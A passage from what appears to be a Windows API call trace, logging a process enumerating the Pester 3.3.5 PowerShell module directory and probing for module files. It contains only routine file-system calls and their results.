hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.048] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.048] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.049] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.049] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.049] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.049] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.050] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.050] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.050] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.050] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.050] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.051] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.051] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.051] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.051] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.051] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.051] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.052] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.052] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0281.052] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.052] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.053] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.053] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.054] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.054] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.054] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.054] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.055] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.055] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.055] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.055] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.055] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.055] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.056] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.056] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.056] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.056] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.056] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.056] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0281.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0281.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0281.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0281.057] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0281.057] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.057] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0281.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.057] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.057] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", 